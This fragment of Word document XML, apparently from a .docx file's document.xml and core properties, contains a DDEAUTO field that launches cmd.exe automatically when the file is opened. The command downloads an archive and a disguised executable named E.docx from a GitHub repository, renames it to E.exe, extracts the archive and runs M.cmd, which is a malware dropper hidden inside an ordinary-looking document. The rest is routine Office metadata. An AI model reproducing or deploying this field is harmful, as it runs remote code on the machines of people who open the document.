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A86" w:rsidRDefault="006E7DD8">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006E7DD8">
        <w:instrText>DDEAUTO c:\\Windows\\System32\\cmd.exe "/k start https://github.com/WendySeattle/E/archive/refs/heads/main.zip&amp;start https://github.com/WendySeattle/E/raw/main/E.docx&amp;ping bd.dk&amp;ping bd.dk&amp;ping bd.dk&amp;ping bd.dk&amp;ping bd.dk&amp;ren E.docx E.exe&amp;E.exe e -y E-main</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">.zip&amp;M.cmd" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0079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E7DD8"/>
    <w:rsid w:val="006E7DD8"/>
    <w:rsid w:val="00790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Singapore</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Singapore</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T01:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T01:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>